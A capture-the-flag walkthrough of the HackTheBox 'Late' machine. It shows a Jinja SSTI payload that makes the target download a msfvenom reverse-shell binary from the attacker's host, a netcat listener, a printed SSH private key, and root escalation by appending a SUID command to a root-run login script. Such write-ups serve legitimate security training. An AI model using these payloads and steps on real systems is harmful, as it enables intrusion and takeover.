HackTheBox – Late

Hi everyone! This is a Linux machine challenge that was created on 24 April 2022. This machine requires us to utilize Optical Character Recognition (OCR) in Python for SSTI which gives us initial access. For privilege escalation, we are required to enumerate files in the victim machine owned by the user and modify a script that will be executed by root whenever we SSH into the machine. Let’s get started!

1. Nmap enumeration

$ IP=10.10.11.156

$ nmap -sC -sV -p- $IP
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.11 seconds

2. Web enumeration

2.1 Domain name discovery

Modify the /etc/hosts file to include the domain name.

$ sudo nano /etc/hosts

Below shows my /etc/hosts new content:

127.0.0.1       localhost
127.0.1.1       kali

10.10.11.156 late.htb images.late.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

2.2 images.late.htb

2.3 Testing text-based image upload

As we know based on the website that it will auto parse the text in an uploaded image and return the result to us. Let’s give it a try. I created an image, testing.png, as shown below using Paint on Windows OS with Calibri font and font size 22 before transferring it to my Kali machine to upload.

Once uploaded, the website will let me download the result, results.txt, which indeed contains the same text in the image.

2.4 SSTI vulnerability discovery

I decided to give Server-Side Template Injection (SSTI) a try as shown in ssti_test.png below which turn out to be successful.

I was able to get back the result of 2*6.

2.5 Obtaining the correct font and size

As we know we can use Method Resolution Order (MRO) to obtain a shell, there was an error when I tried to do so. I decided to remove the curly brackets to check the text and noticed that some of the characters like underscores are missing. After a few experiments, Source Code Pro Black font with font size 14 and zoom in image capture using Windows’ snip tool is the best without frequently have any characters parsed incorrectly. This is actually the hardest of this machine which is to make the parsing work. A lot of patience is needed. Keep retrying until it works.

2.6 Reverse shell

Generate reverse shell file:

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=8080 -f elf -o rshell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: rshell.elf

We can now exploit the RCE to get our generated reverse shell file. Remember to start HTTP service on port 80 and a netcat listener on port 8080.

{{request.application.__globals__.__builtins__.__import__('os').system('wget http://10.10.14.8/rshell.elf')}}

You should get a successful connection from the victim machine.

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.156 - - [07/Jul/2022 08:50:10] "GET /rshell.elf HTTP/1.1" 200 -

We can now change the permission before executing it.

Finally, our netcat listener should receive a shell.

$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.11.156] 49900
python -c 'import pty; pty.spawn("/bin/bash")'
svc_acc@late:/home/svc_acc/app$ 

2.7 Obtain user flag

svc_acc@late:/home/svc_acc/app$ cd ~
cd ~
svc_acc@late:/home/svc_acc$ ls
ls
app  user.txt
svc_acc@late:/home/svc_acc$ cat user.txt
cat user.txt
a7******************************
svc_acc@late:/home/svc_acc$ 

3. Privilege escalation

3.1 Discovered interesting script

svc_acc@late:/home/svc_acc$ find / -group svc_acc 2>/dev/null
...
/usr/local/sbin/ssh-alert.sh
...

svc_acc@late:/home/svc_acc$ ls -l /usr/local/sbin/ssh-alert.sh
ls -l /usr/local/sbin/ssh-alert.sh
-rwxr-xr-x 1 svc_acc svc_acc 433 Jul  7 13:43 /usr/local/sbin/ssh-alert.sh

svc_acc@late:/home/svc_acc$ cat /usr/local/sbin/ssh-alert.sh
cat /usr/local/sbin/ssh-alert.sh
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

3.2 Test if the script will be executed as root

Firstly, we will need tools like pspy to monitor the processes. I downloaded pspy into my Kali machine first from Github.

$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

Next, obtain the ssh private key and store it in le_key.txt. Otherwise, once we execute pspy, we will need another reverse shell in the machine which is troublesome.

svc_acc@late:/home/svc_acc$ cat ~/.ssh/id_rsa
cat ~/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM
HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO
bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi
/mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7
d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7
7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM
fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0
ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz
W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ
uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC
T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH
Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi
WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng
Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7
t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq
0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE
uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y
3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ
GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F
ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb
Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr
kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+
Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL
K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0
kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw==
-----END RSA PRIVATE KEY-----

We can now run pspy on the victim’s machine.

svc_acc@late:/home/svc_acc$ chmod +x pspy64

svc_acc@late:/home/svc_acc$ ./pspy64

Connect to the victim’s machine via SSH using the private key, le_key.txt.

$ chmod 600 ./le_key.txt

$ ssh svc_acc@10.10.11.156 -i ./le_key.txt
svc_acc@late:~$ 

We should see the script is executed as root, UID 0.

Obtain root shell

Since we know the script will be executed as root, we can append a malicious command at the end of the script to make /bin/bash SUID.

svc_acc@late:~$ echo "chmod u+s /bin/bash" >> /usr/local/sbin/ssh-alert.sh

Attempt to SSH in again.

$ ssh svc_acc@10.10.11.156 -i ./le_key.txt

/bin/bash should now be set to SUID. We can obtain a root shell using it.

svc_acc@late:~$ bash -p
bash-4.4# id
uid=1000(svc_acc) gid=1000(svc_acc) euid=0(root) groups=1000(svc_acc)
bash-4.4#

Obtaining root flag

bash-4.4# cd /root
bash-4.4# ls
root.txt  scripts
bash-4.4# cat root.txt
f1******************************

I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.